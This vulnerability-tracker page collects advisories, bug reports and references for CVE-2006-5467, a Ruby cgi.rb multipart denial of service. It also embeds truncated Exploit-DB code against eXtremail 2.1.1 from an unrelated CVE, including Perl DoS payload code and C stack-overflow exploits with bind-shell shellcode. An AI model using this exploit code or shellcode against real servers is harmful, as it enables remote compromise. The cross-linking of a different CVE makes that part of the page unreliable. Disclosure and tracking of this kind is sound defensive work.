CVE-2006-5467
published 2006-10-27CVE-2006-5467: The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a…
PriorityP421medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
4.07%
89.4th percentile
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
| yukihiro_matsumoto | ruby | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
ruby's cgi.rb vulnerable infinite loop DoS
vendor_redhat·2006-12-04·CVSS 5.0
CVE-2006-6303 [MEDIUM] CWE-835 ruby's cgi.rb vulnerable infinite loop DoS
ruby's cgi.rb vulnerable infinite loop DoS
The read_multipart function in cgi.rb in Ruby before 1.8.5-p2 does not properly detect boundaries in MIME multipart content, which allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP requests, a different issue than CVE-2006-5467.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Ubuntu
Ruby vulnerability
vendor_ubuntu·2006-11-01
CVE-2006-5467 Ruby vulnerability
Title: Ruby vulnerability
Summary: Ruby vulnerability
An error was found in Ruby's CGI library that did not correctly check
for the end of multipart MIME requests. Using a crafted HTTP request, a
remote user could cause a denial of service, where Ruby CGI applications
would end up in a loop, monopolizing a CPU.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
Ruby CGI multipart parsing DoS
vendor_redhat·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] Ruby CGI multipart parsing DoS
Ruby CGI multipart parsing DoS
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
GHSA
GHSA-cgqx-jwj4-2jc4: The cgi
ghsa_unreviewed·2022-05-03
CVE-2006-5467 [MEDIUM] GHSA-cgqx-jwj4-2jc4: The cgi
The cgi.rb CGI library for Ruby 1.8 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an HTTP request with a multipart MIME body that contains an invalid boundary specifier, as demonstrated using a specifier that begins with a "-" instead of "--" and contains an inconsistent ID.
GHSA
GHSA-fx2r-qhmq-3jjp: The read_multipart function in cgi
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-6303 [MEDIUM] GHSA-fx2r-qhmq-3jjp: The read_multipart function in cgi
The read_multipart function in cgi.rb in Ruby before 1.8.5-p2 does not properly detect boundaries in MIME multipart content, which allows remote attackers to cause a denial of service (infinite loop) via crafted HTTP requests, a different issue than CVE-2006-5467.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
sub print_header {
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-26·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
CVE-2006-5467 Ruby CGI multipart parsing DoS
+++ This bug was initially created as a clone of Bug #212237 +++
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
-- Additional comment from bressers@red
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
CVE-2006-5467 Ruby CGI multipart parsing DoS
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Created attachment 139389
Proposed pat
ftp://patches.sgi.com/support/free/security/advisories/20061101-01-Phttp://docs.info.apple.com/article.html?artnum=305530http://lists.apple.com/archives/security-announce/2007/May/msg00004.htmlhttp://rubyforge.org/pipermail/mongrel-users/2006-October/001946.htmlhttp://secunia.com/advisories/22615http://secunia.com/advisories/22624http://secunia.com/advisories/22761http://secunia.com/advisories/22929http://secunia.com/advisories/22932http://secunia.com/advisories/23040http://secunia.com/advisories/23344http://secunia.com/advisories/25402http://security.gentoo.org/glsa/glsa-200611-12.xmlhttp://securitytracker.com/id?1017194http://www.debian.org/security/2006/dsa-1234http://www.debian.org/security/2006/dsa-1235http://www.mandriva.com/security/advisories?name=MDKSA-2006:192http://www.novell.com/linux/security/advisories/2006_26_sr.htmlhttp://www.openpkg.org/security/advisories/OpenPKG-SA-2006.030-ruby.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0729.htmlhttp://www.securityfocus.com/bid/20777http://www.ubuntu.com/usn/usn-371-1http://www.vupen.com/english/advisories/2006/4244http://www.vupen.com/english/advisories/2006/4245http://www.vupen.com/english/advisories/2007/1939https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10185ftp://patches.sgi.com/support/free/security/advisories/20061101-01-Phttp://docs.info.apple.com/article.html?artnum=305530http://lists.apple.com/archives/security-announce/2007/May/msg00004.htmlhttp://rubyforge.org/pipermail/mongrel-users/2006-October/001946.htmlhttp://secunia.com/advisories/22615http://secunia.com/advisories/22624http://secunia.com/advisories/22761http://secunia.com/advisories/22929http://secunia.com/advisories/22932http://secunia.com/advisories/23040http://secunia.com/advisories/23344http://secunia.com/advisories/25402http://security.gentoo.org/glsa/glsa-200611-12.xmlhttp://securitytracker.com/id?1017194http://www.debian.org/security/2006/dsa-1234http://www.debian.org/security/2006/dsa-1235http://www.mandriva.com/security/advisories?name=MDKSA-2006:192http://www.novell.com/linux/security/advisories/2006_26_sr.htmlhttp://www.openpkg.org/security/advisories/OpenPKG-SA-2006.030-ruby.htmlhttp://www.redhat.com/support/errata/RHSA-2006-0729.htmlhttp://www.securityfocus.com/bid/20777http://www.ubuntu.com/usn/usn-371-1http://www.vupen.com/english/advisories/2006/4244http://www.vupen.com/english/advisories/2006/4245http://www.vupen.com/english/advisories/2007/1939https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10185
2006-10-27
Published